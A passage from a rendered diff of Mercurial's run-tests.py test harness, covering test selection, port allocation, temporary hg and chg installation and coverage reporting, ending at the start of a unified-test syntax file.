3271 desc = testdescs[0]
3271 desc = testdescs[0]
3272 # desc['path'] is a relative path
3272 # desc['path'] is a relative path
3273 if 'case' in desc:
3273 if 'case' in desc:
3274 casestr = b'#'.join(desc['case'])
3274 casestr = b'#'.join(desc['case'])
3275 errpath = b'%s#%s.err' % (desc['path'], casestr)
3275 errpath = b'%s#%s.err' % (desc['path'], casestr)
3276 else:
3276 else:
3277 errpath = b'%s.err' % desc['path']
3277 errpath = b'%s.err' % desc['path']
3278 errpath = os.path.join(self._outputdir, errpath)
3278 errpath = os.path.join(self._outputdir, errpath)
3279 if os.path.exists(errpath):
3279 if os.path.exists(errpath):
3280 break
3280 break
3281 testdescs.pop(0)
3281 testdescs.pop(0)
3282 if not testdescs:
3282 if not testdescs:
3283 print("running all tests")
3283 print("running all tests")
3284 testdescs = orig
3284 testdescs = orig
3285
3285
3286 tests = [self._gettest(d, i) for i, d in enumerate(testdescs)]
3286 tests = [self._gettest(d, i) for i, d in enumerate(testdescs)]
3287 num_tests = len(tests) * self.options.runs_per_test
3287 num_tests = len(tests) * self.options.runs_per_test
3288
3288
3289 jobs = min(num_tests, self.options.jobs)
3289 jobs = min(num_tests, self.options.jobs)
3290
3290
3291 failed = False
3291 failed = False
3292 kws = self.options.keywords
3292 kws = self.options.keywords
3293 if kws is not None and PYTHON3:
3293 if kws is not None and PYTHON3:
3294 kws = kws.encode('utf-8')
3294 kws = kws.encode('utf-8')
3295
3295
3296 suite = TestSuite(
3296 suite = TestSuite(
3297 self._testdir,
3297 self._testdir,
3298 jobs=jobs,
3298 jobs=jobs,
3299 whitelist=self.options.whitelisted,
3299 whitelist=self.options.whitelisted,
3300 blacklist=self.options.blacklist,
3300 blacklist=self.options.blacklist,
3301 retest=self.options.retest,
3301 retest=self.options.retest,
3302 keywords=kws,
3302 keywords=kws,
3303 loop=self.options.loop,
3303 loop=self.options.loop,
3304 runs_per_test=self.options.runs_per_test,
3304 runs_per_test=self.options.runs_per_test,
3305 showchannels=self.options.showchannels,
3305 showchannels=self.options.showchannels,
3306 tests=tests,
3306 tests=tests,
3307 loadtest=_reloadtest,
3307 loadtest=_reloadtest,
3308 )
3308 )
3309 verbosity = 1
3309 verbosity = 1
3310 if self.options.list_tests:
3310 if self.options.list_tests:
3311 verbosity = 0
3311 verbosity = 0
3312 elif self.options.verbose:
3312 elif self.options.verbose:
3313 verbosity = 2
3313 verbosity = 2
3314 runner = TextTestRunner(self, verbosity=verbosity)
3314 runner = TextTestRunner(self, verbosity=verbosity)
3315
3315
3316 if self.options.list_tests:
3316 if self.options.list_tests:
3317 result = runner.listtests(suite)
3317 result = runner.listtests(suite)
3318 else:
3318 else:
3319 if self._installdir:
3319 if self._installdir:
3320 self._installhg()
3320 self._installhg()
3321 self._checkhglib("Testing")
3321 self._checkhglib("Testing")
3322 else:
3322 else:
3323 self._usecorrectpython()
3323 self._usecorrectpython()
3324 if self.options.chg:
3324 if self.options.chg:
3325 assert self._installdir
3325 assert self._installdir
3326 self._installchg()
3326 self._installchg()
3327
3327
3328 log(
3328 log(
3329 'running %d tests using %d parallel processes'
3329 'running %d tests using %d parallel processes'
3330 % (num_tests, jobs)
3330 % (num_tests, jobs)
3331 )
3331 )
3332
3332
3333 result = runner.run(suite)
3333 result = runner.run(suite)
3334
3334
3335 if result.failures or result.errors:
3335 if result.failures or result.errors:
3336 failed = True
3336 failed = True
3337
3337
3338 result.onEnd()
3338 result.onEnd()
3339
3339
3340 if self.options.anycoverage:
3340 if self.options.anycoverage:
3341 self._outputcoverage()
3341 self._outputcoverage()
3342 except KeyboardInterrupt:
3342 except KeyboardInterrupt:
3343 failed = True
3343 failed = True
3344 print("\ninterrupted!")
3344 print("\ninterrupted!")
3345
3345
3346 if failed:
3346 if failed:
3347 return 1
3347 return 1
3348
3348
3349 def _getport(self, count):
3349 def _getport(self, count):
3350 port = self._ports.get(count) # do we have a cached entry?
3350 port = self._ports.get(count) # do we have a cached entry?
3351 if port is None:
3351 if port is None:
3352 portneeded = 3
3352 portneeded = 3
3353 # above 100 tries we just give up and let test reports failure
3353 # above 100 tries we just give up and let test reports failure
3354 for tries in xrange(100):
3354 for tries in xrange(100):
3355 allfree = True
3355 allfree = True
3356 port = self.options.port + self._portoffset
3356 port = self.options.port + self._portoffset
3357 for idx in xrange(portneeded):
3357 for idx in xrange(portneeded):
3358 if not checkportisavailable(port + idx):
3358 if not checkportisavailable(port + idx):
3359 allfree = False
3359 allfree = False
3360 break
3360 break
3361 self._portoffset += portneeded
3361 self._portoffset += portneeded
3362 if allfree:
3362 if allfree:
3363 break
3363 break
3364 self._ports[count] = port
3364 self._ports[count] = port
3365 return port
3365 return port
3366
3366
3367 def _gettest(self, testdesc, count):
3367 def _gettest(self, testdesc, count):
3368 """Obtain a Test by looking at its filename.
3368 """Obtain a Test by looking at its filename.
3369
3369
3370 Returns a Test instance. The Test may not be runnable if it doesn't
3370 Returns a Test instance. The Test may not be runnable if it doesn't
3371 map to a known type.
3371 map to a known type.
3372 """
3372 """
3373 path = testdesc['path']
3373 path = testdesc['path']
3374 lctest = path.lower()
3374 lctest = path.lower()
3375 testcls = Test
3375 testcls = Test
3376
3376
3377 for ext, cls in self.TESTTYPES:
3377 for ext, cls in self.TESTTYPES:
3378 if lctest.endswith(ext):
3378 if lctest.endswith(ext):
3379 testcls = cls
3379 testcls = cls
3380 break
3380 break
3381
3381
3382 refpath = os.path.join(getcwdb(), path)
3382 refpath = os.path.join(getcwdb(), path)
3383 tmpdir = os.path.join(self._hgtmp, b'child%d' % count)
3383 tmpdir = os.path.join(self._hgtmp, b'child%d' % count)
3384
3384
3385 # extra keyword parameters. 'case' is used by .t tests
3385 # extra keyword parameters. 'case' is used by .t tests
3386 kwds = {k: testdesc[k] for k in ['case'] if k in testdesc}
3386 kwds = {k: testdesc[k] for k in ['case'] if k in testdesc}
3387
3387
3388 t = testcls(
3388 t = testcls(
3389 refpath,
3389 refpath,
3390 self._outputdir,
3390 self._outputdir,
3391 tmpdir,
3391 tmpdir,
3392 keeptmpdir=self.options.keep_tmpdir,
3392 keeptmpdir=self.options.keep_tmpdir,
3393 debug=self.options.debug,
3393 debug=self.options.debug,
3394 first=self.options.first,
3394 first=self.options.first,
3395 timeout=self.options.timeout,
3395 timeout=self.options.timeout,
3396 startport=self._getport(count),
3396 startport=self._getport(count),
3397 extraconfigopts=self.options.extra_config_opt,
3397 extraconfigopts=self.options.extra_config_opt,
3398 shell=self.options.shell,
3398 shell=self.options.shell,
3399 hgcommand=self._hgcommand,
3399 hgcommand=self._hgcommand,
3400 usechg=bool(self.options.with_chg or self.options.chg),
3400 usechg=bool(self.options.with_chg or self.options.chg),
3401 chgdebug=self.options.chg_debug,
3401 chgdebug=self.options.chg_debug,
3402 useipv6=useipv6,
3402 useipv6=useipv6,
3403 **kwds
3403 **kwds
3404 )
3404 )
3405 t.should_reload = True
3405 t.should_reload = True
3406 return t
3406 return t
3407
3407
3408 def _cleanup(self):
3408 def _cleanup(self):
3409 """Clean up state from this test invocation."""
3409 """Clean up state from this test invocation."""
3410 if self.options.keep_tmpdir:
3410 if self.options.keep_tmpdir:
3411 return
3411 return
3412
3412
3413 vlog("# Cleaning up HGTMP", _bytes2sys(self._hgtmp))
3413 vlog("# Cleaning up HGTMP", _bytes2sys(self._hgtmp))
3414 shutil.rmtree(self._hgtmp, True)
3414 shutil.rmtree(self._hgtmp, True)
3415 for f in self._createdfiles:
3415 for f in self._createdfiles:
3416 try:
3416 try:
3417 os.remove(f)
3417 os.remove(f)
3418 except OSError:
3418 except OSError:
3419 pass
3419 pass
3420
3420
3421 def _usecorrectpython(self):
3421 def _usecorrectpython(self):
3422 """Configure the environment to use the appropriate Python in tests."""
3422 """Configure the environment to use the appropriate Python in tests."""
3423 # Tests must use the same interpreter as us or bad things will happen.
3423 # Tests must use the same interpreter as us or bad things will happen.
3424 pyexename = sys.platform == 'win32' and b'python.exe' or b'python'
3424 pyexename = sys.platform == 'win32' and b'python.exe' or b'python'
3425
3425
3426 # os.symlink() is a thing with py3 on Windows, but it requires
3426 # os.symlink() is a thing with py3 on Windows, but it requires
3427 # Administrator rights.
3427 # Administrator rights.
3428 if getattr(os, 'symlink', None) and os.name != 'nt':
3428 if getattr(os, 'symlink', None) and os.name != 'nt':
3429 vlog(
3429 vlog(
3430 "# Making python executable in test path a symlink to '%s'"
3430 "# Making python executable in test path a symlink to '%s'"
3431 % sysexecutable
3431 % sysexecutable
3432 )
3432 )
3433 mypython = os.path.join(self._tmpbindir, pyexename)
3433 mypython = os.path.join(self._tmpbindir, pyexename)
3434 try:
3434 try:
3435 if os.readlink(mypython) == sysexecutable:
3435 if os.readlink(mypython) == sysexecutable:
3436 return
3436 return
3437 os.unlink(mypython)
3437 os.unlink(mypython)
3438 except OSError as err:
3438 except OSError as err:
3439 if err.errno != errno.ENOENT:
3439 if err.errno != errno.ENOENT:
3440 raise
3440 raise
3441 if self._findprogram(pyexename) != sysexecutable:
3441 if self._findprogram(pyexename) != sysexecutable:
3442 try:
3442 try:
3443 os.symlink(sysexecutable, mypython)
3443 os.symlink(sysexecutable, mypython)
3444 self._createdfiles.append(mypython)
3444 self._createdfiles.append(mypython)
3445 except OSError as err:
3445 except OSError as err:
3446 # child processes may race, which is harmless
3446 # child processes may race, which is harmless
3447 if err.errno != errno.EEXIST:
3447 if err.errno != errno.EEXIST:
3448 raise
3448 raise
3449 else:
3449 else:
3450 exedir, exename = os.path.split(sysexecutable)
3450 exedir, exename = os.path.split(sysexecutable)
3451 vlog(
3451 vlog(
3452 "# Modifying search path to find %s as %s in '%s'"
3452 "# Modifying search path to find %s as %s in '%s'"
3453 % (exename, pyexename, exedir)
3453 % (exename, pyexename, exedir)
3454 )
3454 )
3455 path = os.environ['PATH'].split(os.pathsep)
3455 path = os.environ['PATH'].split(os.pathsep)
3456 while exedir in path:
3456 while exedir in path:
3457 path.remove(exedir)
3457 path.remove(exedir)
3458 os.environ['PATH'] = os.pathsep.join([exedir] + path)
3458 os.environ['PATH'] = os.pathsep.join([exedir] + path)
3459 if not self._findprogram(pyexename):
3459 if not self._findprogram(pyexename):
3460 print("WARNING: Cannot find %s in search path" % pyexename)
3460 print("WARNING: Cannot find %s in search path" % pyexename)
3461
3461
3462 def _installhg(self):
3462 def _installhg(self):
3463 """Install hg into the test environment.
3463 """Install hg into the test environment.
3464
3464
3465 This will also configure hg with the appropriate testing settings.
3465 This will also configure hg with the appropriate testing settings.
3466 """
3466 """
3467 vlog("# Performing temporary installation of HG")
3467 vlog("# Performing temporary installation of HG")
3468 installerrs = os.path.join(self._hgtmp, b"install.err")
3468 installerrs = os.path.join(self._hgtmp, b"install.err")
3469 compiler = ''
3469 compiler = ''
3470 if self.options.compiler:
3470 if self.options.compiler:
3471 compiler = '--compiler ' + self.options.compiler
3471 compiler = '--compiler ' + self.options.compiler
3472 setup_opts = b""
3472 setup_opts = b""
3473 if self.options.pure:
3473 if self.options.pure:
3474 setup_opts = b"--pure"
3474 setup_opts = b"--pure"
3475 elif self.options.rust:
3475 elif self.options.rust:
3476 setup_opts = b"--rust"
3476 setup_opts = b"--rust"
3477 elif self.options.no_rust:
3477 elif self.options.no_rust:
3478 setup_opts = b"--no-rust"
3478 setup_opts = b"--no-rust"
3479
3479
3480 # Run installer in hg root
3480 # Run installer in hg root
3481 script = os.path.realpath(sys.argv[0])
3481 script = os.path.realpath(sys.argv[0])
3482 exe = sysexecutable
3482 exe = sysexecutable
3483 if PYTHON3:
3483 if PYTHON3:
3484 compiler = _sys2bytes(compiler)
3484 compiler = _sys2bytes(compiler)
3485 script = _sys2bytes(script)
3485 script = _sys2bytes(script)
3486 exe = _sys2bytes(exe)
3486 exe = _sys2bytes(exe)
3487 hgroot = os.path.dirname(os.path.dirname(script))
3487 hgroot = os.path.dirname(os.path.dirname(script))
3488 self._hgroot = hgroot
3488 self._hgroot = hgroot
3489 os.chdir(hgroot)
3489 os.chdir(hgroot)
3490 nohome = b'--home=""'
3490 nohome = b'--home=""'
3491 if os.name == 'nt':
3491 if os.name == 'nt':
3492 # The --home="" trick works only on OS where os.sep == '/'
3492 # The --home="" trick works only on OS where os.sep == '/'
3493 # because of a distutils convert_path() fast-path. Avoid it at
3493 # because of a distutils convert_path() fast-path. Avoid it at
3494 # least on Windows for now, deal with .pydistutils.cfg bugs
3494 # least on Windows for now, deal with .pydistutils.cfg bugs
3495 # when they happen.
3495 # when they happen.
3496 nohome = b''
3496 nohome = b''
3497 cmd = (
3497 cmd = (
3498 b'"%(exe)s" setup.py %(setup_opts)s clean --all'
3498 b'"%(exe)s" setup.py %(setup_opts)s clean --all'
3499 b' build %(compiler)s --build-base="%(base)s"'
3499 b' build %(compiler)s --build-base="%(base)s"'
3500 b' install --force --prefix="%(prefix)s"'
3500 b' install --force --prefix="%(prefix)s"'
3501 b' --install-lib="%(libdir)s"'
3501 b' --install-lib="%(libdir)s"'
3502 b' --install-scripts="%(bindir)s" %(nohome)s >%(logfile)s 2>&1'
3502 b' --install-scripts="%(bindir)s" %(nohome)s >%(logfile)s 2>&1'
3503 % {
3503 % {
3504 b'exe': exe,
3504 b'exe': exe,
3505 b'setup_opts': setup_opts,
3505 b'setup_opts': setup_opts,
3506 b'compiler': compiler,
3506 b'compiler': compiler,
3507 b'base': os.path.join(self._hgtmp, b"build"),
3507 b'base': os.path.join(self._hgtmp, b"build"),
3508 b'prefix': self._installdir,
3508 b'prefix': self._installdir,
3509 b'libdir': self._pythondir,
3509 b'libdir': self._pythondir,
3510 b'bindir': self._bindir,
3510 b'bindir': self._bindir,
3511 b'nohome': nohome,
3511 b'nohome': nohome,
3512 b'logfile': installerrs,
3512 b'logfile': installerrs,
3513 }
3513 }
3514 )
3514 )
3515
3515
3516 # setuptools requires install directories to exist.
3516 # setuptools requires install directories to exist.
3517 def makedirs(p):
3517 def makedirs(p):
3518 try:
3518 try:
3519 os.makedirs(p)
3519 os.makedirs(p)
3520 except OSError as e:
3520 except OSError as e:
3521 if e.errno != errno.EEXIST:
3521 if e.errno != errno.EEXIST:
3522 raise
3522 raise
3523
3523
3524 makedirs(self._pythondir)
3524 makedirs(self._pythondir)
3525 makedirs(self._bindir)
3525 makedirs(self._bindir)
3526
3526
3527 vlog("# Running", cmd.decode("utf-8"))
3527 vlog("# Running", cmd.decode("utf-8"))
3528 if subprocess.call(_bytes2sys(cmd), shell=True) == 0:
3528 if subprocess.call(_bytes2sys(cmd), shell=True) == 0:
3529 if not self.options.verbose:
3529 if not self.options.verbose:
3530 try:
3530 try:
3531 os.remove(installerrs)
3531 os.remove(installerrs)
3532 except OSError as e:
3532 except OSError as e:
3533 if e.errno != errno.ENOENT:
3533 if e.errno != errno.ENOENT:
3534 raise
3534 raise
3535 else:
3535 else:
3536 with open(installerrs, 'rb') as f:
3536 with open(installerrs, 'rb') as f:
3537 for line in f:
3537 for line in f:
3538 if PYTHON3:
3538 if PYTHON3:
3539 sys.stdout.buffer.write(line)
3539 sys.stdout.buffer.write(line)
3540 else:
3540 else:
3541 sys.stdout.write(line)
3541 sys.stdout.write(line)
3542 sys.exit(1)
3542 sys.exit(1)
3543 os.chdir(self._testdir)
3543 os.chdir(self._testdir)
3544
3544
3545 self._usecorrectpython()
3545 self._usecorrectpython()
3546
3546
3547 hgbat = os.path.join(self._bindir, b'hg.bat')
3547 hgbat = os.path.join(self._bindir, b'hg.bat')
3548 if os.path.isfile(hgbat):
3548 if os.path.isfile(hgbat):
3549 # hg.bat expects to be put in bin/scripts while run-tests.py
3549 # hg.bat expects to be put in bin/scripts while run-tests.py
3550 # installation layout put it in bin/ directly. Fix it
3550 # installation layout put it in bin/ directly. Fix it
3551 with open(hgbat, 'rb') as f:
3551 with open(hgbat, 'rb') as f:
3552 data = f.read()
3552 data = f.read()
3553 if br'"%~dp0..\python" "%~dp0hg" %*' in data:
3553 if br'"%~dp0..\python" "%~dp0hg" %*' in data:
3554 data = data.replace(
3554 data = data.replace(
3555 br'"%~dp0..\python" "%~dp0hg" %*',
3555 br'"%~dp0..\python" "%~dp0hg" %*',
3556 b'"%~dp0python" "%~dp0hg" %*',
3556 b'"%~dp0python" "%~dp0hg" %*',
3557 )
3557 )
3558 with open(hgbat, 'wb') as f:
3558 with open(hgbat, 'wb') as f:
3559 f.write(data)
3559 f.write(data)
3560 else:
3560 else:
3561 print('WARNING: cannot fix hg.bat reference to python.exe')
3561 print('WARNING: cannot fix hg.bat reference to python.exe')
3562
3562
3563 if self.options.anycoverage:
3563 if self.options.anycoverage:
3564 custom = os.path.join(
3564 custom = os.path.join(
3565 osenvironb[b'RUNTESTDIR'], b'sitecustomize.py'
3565 osenvironb[b'RUNTESTDIR'], b'sitecustomize.py'
3566 )
3566 )
3567 target = os.path.join(self._pythondir, b'sitecustomize.py')
3567 target = os.path.join(self._pythondir, b'sitecustomize.py')
3568 vlog('# Installing coverage trigger to %s' % target)
3568 vlog('# Installing coverage trigger to %s' % target)
3569 shutil.copyfile(custom, target)
3569 shutil.copyfile(custom, target)
3570 rc = os.path.join(self._testdir, b'.coveragerc')
3570 rc = os.path.join(self._testdir, b'.coveragerc')
3571 vlog('# Installing coverage rc to %s' % rc)
3571 vlog('# Installing coverage rc to %s' % rc)
3572 osenvironb[b'COVERAGE_PROCESS_START'] = rc
3572 osenvironb[b'COVERAGE_PROCESS_START'] = rc
3573 covdir = os.path.join(self._installdir, b'..', b'coverage')
3573 covdir = os.path.join(self._installdir, b'..', b'coverage')
3574 try:
3574 try:
3575 os.mkdir(covdir)
3575 os.mkdir(covdir)
3576 except OSError as e:
3576 except OSError as e:
3577 if e.errno != errno.EEXIST:
3577 if e.errno != errno.EEXIST:
3578 raise
3578 raise
3579
3579
3580 osenvironb[b'COVERAGE_DIR'] = covdir
3580 osenvironb[b'COVERAGE_DIR'] = covdir
3581
3581
3582 def _checkhglib(self, verb):
3582 def _checkhglib(self, verb):
3583 """Ensure that the 'mercurial' package imported by python is
3583 """Ensure that the 'mercurial' package imported by python is
3584 the one we expect it to be. If not, print a warning to stderr."""
3584 the one we expect it to be. If not, print a warning to stderr."""
3585 if (self._bindir == self._pythondir) and (
3585 if (self._bindir == self._pythondir) and (
3586 self._bindir != self._tmpbindir
3586 self._bindir != self._tmpbindir
3587 ):
3587 ):
3588 # The pythondir has been inferred from --with-hg flag.
3588 # The pythondir has been inferred from --with-hg flag.
3589 # We cannot expect anything sensible here.
3589 # We cannot expect anything sensible here.
3590 return
3590 return
3591 expecthg = os.path.join(self._pythondir, b'mercurial')
3591 expecthg = os.path.join(self._pythondir, b'mercurial')
3592 actualhg = self._gethgpath()
3592 actualhg = self._gethgpath()
3593 if os.path.abspath(actualhg) != os.path.abspath(expecthg):
3593 if os.path.abspath(actualhg) != os.path.abspath(expecthg):
3594 sys.stderr.write(
3594 sys.stderr.write(
3595 'warning: %s with unexpected mercurial lib: %s\n'
3595 'warning: %s with unexpected mercurial lib: %s\n'
3596 ' (expected %s)\n' % (verb, actualhg, expecthg)
3596 ' (expected %s)\n' % (verb, actualhg, expecthg)
3597 )
3597 )
3598
3598
3599 def _gethgpath(self):
3599 def _gethgpath(self):
3600 """Return the path to the mercurial package that is actually found by
3600 """Return the path to the mercurial package that is actually found by
3601 the current Python interpreter."""
3601 the current Python interpreter."""
3602 if self._hgpath is not None:
3602 if self._hgpath is not None:
3603 return self._hgpath
3603 return self._hgpath
3604
3604
3605 cmd = b'"%s" -c "import mercurial; print (mercurial.__path__[0])"'
3605 cmd = b'"%s" -c "import mercurial; print (mercurial.__path__[0])"'
3606 cmd = cmd % PYTHON
3606 cmd = cmd % PYTHON
3607 if PYTHON3:
3607 if PYTHON3:
3608 cmd = _bytes2sys(cmd)
3608 cmd = _bytes2sys(cmd)
3609
3609
3610 p = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
3610 p = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
3611 out, err = p.communicate()
3611 out, err = p.communicate()
3612
3612
3613 self._hgpath = out.strip()
3613 self._hgpath = out.strip()
3614
3614
3615 return self._hgpath
3615 return self._hgpath
3616
3616
3617 def _installchg(self):
3617 def _installchg(self):
3618 """Install chg into the test environment"""
3618 """Install chg into the test environment"""
3619 vlog('# Performing temporary installation of CHG')
3619 vlog('# Performing temporary installation of CHG')
3620 assert os.path.dirname(self._bindir) == self._installdir
3620 assert os.path.dirname(self._bindir) == self._installdir
3621 assert self._hgroot, 'must be called after _installhg()'
3621 assert self._hgroot, 'must be called after _installhg()'
3622 cmd = b'"%(make)s" clean install PREFIX="%(prefix)s"' % {
3622 cmd = b'"%(make)s" clean install PREFIX="%(prefix)s"' % {
3623 b'make': b'make', # TODO: switch by option or environment?
3623 b'make': b'make', # TODO: switch by option or environment?
3624 b'prefix': self._installdir,
3624 b'prefix': self._installdir,
3625 }
3625 }
3626 cwd = os.path.join(self._hgroot, b'contrib', b'chg')
3626 cwd = os.path.join(self._hgroot, b'contrib', b'chg')
3627 vlog("# Running", cmd)
3627 vlog("# Running", cmd)
3628 proc = subprocess.Popen(
3628 proc = subprocess.Popen(
3629 cmd,
3629 cmd,
3630 shell=True,
3630 shell=True,
3631 cwd=cwd,
3631 cwd=cwd,
3632 stdin=subprocess.PIPE,
3632 stdin=subprocess.PIPE,
3633 stdout=subprocess.PIPE,
3633 stdout=subprocess.PIPE,
3634 stderr=subprocess.STDOUT,
3634 stderr=subprocess.STDOUT,
3635 )
3635 )
3636 out, _err = proc.communicate()
3636 out, _err = proc.communicate()
3637 if proc.returncode != 0:
3637 if proc.returncode != 0:
3638 if PYTHON3:
3638 if PYTHON3:
3639 sys.stdout.buffer.write(out)
3639 sys.stdout.buffer.write(out)
3640 else:
3640 else:
3641 sys.stdout.write(out)
3641 sys.stdout.write(out)
3642 sys.exit(1)
3642 sys.exit(1)
3643
3643
3644 def _outputcoverage(self):
3644 def _outputcoverage(self):
3645 """Produce code coverage output."""
3645 """Produce code coverage output."""
3646 import coverage
3646 import coverage
3647
3647
3648 coverage = coverage.coverage
3648 coverage = coverage.coverage
3649
3649
3650 vlog('# Producing coverage report')
3650 vlog('# Producing coverage report')
3651 # chdir is the easiest way to get short, relative paths in the
3651 # chdir is the easiest way to get short, relative paths in the
3652 # output.
3652 # output.
3653 os.chdir(self._hgroot)
3653 os.chdir(self._hgroot)
3654 covdir = os.path.join(_bytes2sys(self._installdir), '..', 'coverage')
3654 covdir = os.path.join(_bytes2sys(self._installdir), '..', 'coverage')
3655 cov = coverage(data_file=os.path.join(covdir, 'cov'))
3655 cov = coverage(data_file=os.path.join(covdir, 'cov'))
3656
3656
3657 # Map install directory paths back to source directory.
3657 # Map install directory paths back to source directory.
3658 cov.config.paths['srcdir'] = ['.', _bytes2sys(self._pythondir)]
3658 cov.config.paths['srcdir'] = ['.', _bytes2sys(self._pythondir)]
3659
3659
3660 cov.combine()
3660 cov.combine()
3661
3661
3662 omit = [
3662 omit = [
3663 _bytes2sys(os.path.join(x, b'*'))
3663 _bytes2sys(os.path.join(x, b'*'))
3664 for x in [self._bindir, self._testdir]
3664 for x in [self._bindir, self._testdir]
3665 ]
3665 ]
3666 cov.report(ignore_errors=True, omit=omit)
3666 cov.report(ignore_errors=True, omit=omit)
3667
3667
3668 if self.options.htmlcov:
3668 if self.options.htmlcov:
3669 htmldir = os.path.join(_bytes2sys(self._outputdir), 'htmlcov')
3669 htmldir = os.path.join(_bytes2sys(self._outputdir), 'htmlcov')
3670 cov.html_report(directory=htmldir, omit=omit)
3670 cov.html_report(directory=htmldir, omit=omit)
3671 if self.options.annotate:
3671 if self.options.annotate:
3672 adir = os.path.join(_bytes2sys(self._outputdir), 'annotated')
3672 adir = os.path.join(_bytes2sys(self._outputdir), 'annotated')
3673 if not os.path.isdir(adir):
3673 if not os.path.isdir(adir):
3674 os.mkdir(adir)
3674 os.mkdir(adir)
3675 cov.annotate(directory=adir, omit=omit)
3675 cov.annotate(directory=adir, omit=omit)
3676
3676
3677 def _findprogram(self, program):
3677 def _findprogram(self, program):
3678 """Search PATH for a executable program"""
3678 """Search PATH for a executable program"""
3679 dpb = _sys2bytes(os.defpath)
3679 dpb = _sys2bytes(os.defpath)
3680 sepb = _sys2bytes(os.pathsep)
3680 sepb = _sys2bytes(os.pathsep)
3681 for p in osenvironb.get(b'PATH', dpb).split(sepb):
3681 for p in osenvironb.get(b'PATH', dpb).split(sepb):
3682 name = os.path.join(p, program)
3682 name = os.path.join(p, program)
3683 if os.name == 'nt' or os.access(name, os.X_OK):
3683 if os.name == 'nt' or os.access(name, os.X_OK):
3684 return name
3684 return name
3685 return None
3685 return None
3686
3686
3687 def _checktools(self):
3687 def _checktools(self):
3688 """Ensure tools required to run tests are present."""
3688 """Ensure tools required to run tests are present."""
3689 for p in self.REQUIREDTOOLS:
3689 for p in self.REQUIREDTOOLS:
3690 if os.name == 'nt' and not p.endswith(b'.exe'):
3690 if os.name == 'nt' and not p.endswith(b'.exe'):
3691 p += b'.exe'
3691 p += b'.exe'
3692 found = self._findprogram(p)
3692 found = self._findprogram(p)
3693 p = p.decode("utf-8")
3693 p = p.decode("utf-8")
3694 if found:
3694 if found:
3695 vlog("# Found prerequisite", p, "at", _bytes2sys(found))
3695 vlog("# Found prerequisite", p, "at", _bytes2sys(found))
3696 else:
3696 else:
3697 print("WARNING: Did not find prerequisite tool: %s " % p)
3697 print("WARNING: Did not find prerequisite tool: %s " % p)
3698
3698
3699
3699
3700 def aggregateexceptions(path):
3700 def aggregateexceptions(path):
3701 exceptioncounts = collections.Counter()
3701 exceptioncounts = collections.Counter()
3702 testsbyfailure = collections.defaultdict(set)
3702 testsbyfailure = collections.defaultdict(set)
3703 failuresbytest = collections.defaultdict(set)
3703 failuresbytest = collections.defaultdict(set)
3704
3704
3705 for f in os.listdir(path):
3705 for f in os.listdir(path):
3706 with open(os.path.join(path, f), 'rb') as fh:
3706 with open(os.path.join(path, f), 'rb') as fh:
3707 data = fh.read().split(b'\0')
3707 data = fh.read().split(b'\0')
3708 if len(data) != 5:
3708 if len(data) != 5:
3709 continue
3709 continue
3710
3710
3711 exc, mainframe, hgframe, hgline, testname = data
3711 exc, mainframe, hgframe, hgline, testname = data
3712 exc = exc.decode('utf-8')
3712 exc = exc.decode('utf-8')
3713 mainframe = mainframe.decode('utf-8')
3713 mainframe = mainframe.decode('utf-8')
3714 hgframe = hgframe.decode('utf-8')
3714 hgframe = hgframe.decode('utf-8')
3715 hgline = hgline.decode('utf-8')
3715 hgline = hgline.decode('utf-8')
3716 testname = testname.decode('utf-8')
3716 testname = testname.decode('utf-8')
3717
3717
3718 key = (hgframe, hgline, exc)
3718 key = (hgframe, hgline, exc)
3719 exceptioncounts[key] += 1
3719 exceptioncounts[key] += 1
3720 testsbyfailure[key].add(testname)
3720 testsbyfailure[key].add(testname)
3721 failuresbytest[testname].add(key)
3721 failuresbytest[testname].add(key)
3722
3722
3723 # Find test having fewest failures for each failure.
3723 # Find test having fewest failures for each failure.
3724 leastfailing = {}
3724 leastfailing = {}
3725 for key, tests in testsbyfailure.items():
3725 for key, tests in testsbyfailure.items():
3726 fewesttest = None
3726 fewesttest = None
3727 fewestcount = 99999999
3727 fewestcount = 99999999
3728 for test in sorted(tests):
3728 for test in sorted(tests):
3729 if len(failuresbytest[test]) < fewestcount:
3729 if len(failuresbytest[test]) < fewestcount:
3730 fewesttest = test
3730 fewesttest = test
3731 fewestcount = len(failuresbytest[test])
3731 fewestcount = len(failuresbytest[test])
3732
3732
3733 leastfailing[key] = (fewestcount, fewesttest)
3733 leastfailing[key] = (fewestcount, fewesttest)
3734
3734
3735 # Create a combined counter so we can sort by total occurrences and
3735 # Create a combined counter so we can sort by total occurrences and
3736 # impacted tests.
3736 # impacted tests.
3737 combined = {}
3737 combined = {}
3738 for key in exceptioncounts:
3738 for key in exceptioncounts:
3739 combined[key] = (
3739 combined[key] = (
3740 exceptioncounts[key],
3740 exceptioncounts[key],
3741 len(testsbyfailure[key]),
3741 len(testsbyfailure[key]),
3742 leastfailing[key][0],
3742 leastfailing[key][0],
3743 leastfailing[key][1],
3743 leastfailing[key][1],
3744 )
3744 )
3745
3745
3746 return {
3746 return {
3747 'exceptioncounts': exceptioncounts,
3747 'exceptioncounts': exceptioncounts,
3748 'total': sum(exceptioncounts.values()),
3748 'total': sum(exceptioncounts.values()),
3749 'combined': combined,
3749 'combined': combined,
3750 'leastfailing': leastfailing,
3750 'leastfailing': leastfailing,
3751 'byfailure': testsbyfailure,
3751 'byfailure': testsbyfailure,
3752 'bytest': failuresbytest,
3752 'bytest': failuresbytest,
3753 }
3753 }
3754
3754
3755
3755
3756 if __name__ == '__main__':
3756 if __name__ == '__main__':
3757 runner = TestRunner()
3757 runner = TestRunner()
3758
3758
3759 try:
3759 try:
3760 import msvcrt
3760 import msvcrt
3761
3761
3762 msvcrt.setmode(sys.stdin.fileno(), os.O_BINARY)
3762 msvcrt.setmode(sys.stdin.fileno(), os.O_BINARY)
3763 msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY)
3763 msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY)
3764 msvcrt.setmode(sys.stderr.fileno(), os.O_BINARY)
3764 msvcrt.setmode(sys.stderr.fileno(), os.O_BINARY)
3765 except ImportError:
3765 except ImportError:
3766 pass
3766 pass
3767
3767
3768 sys.exit(runner.run(sys.argv[1:]))
3768 sys.exit(runner.run(sys.argv[1:]))
@@ -1,134 +1,144 b''
1 Test that the syntax of "unified tests" is properly processed
1 Test that the syntax of "unified tests" is properly processed
2 ==============================================================
2 ==============================================================
3
3
4 Simple commands:
4 Simple commands:
5
5
6 $ echo foo
6 $ echo foo
7 foo
7 foo
8 $ printf 'oh no'
8 $ printf 'oh no'
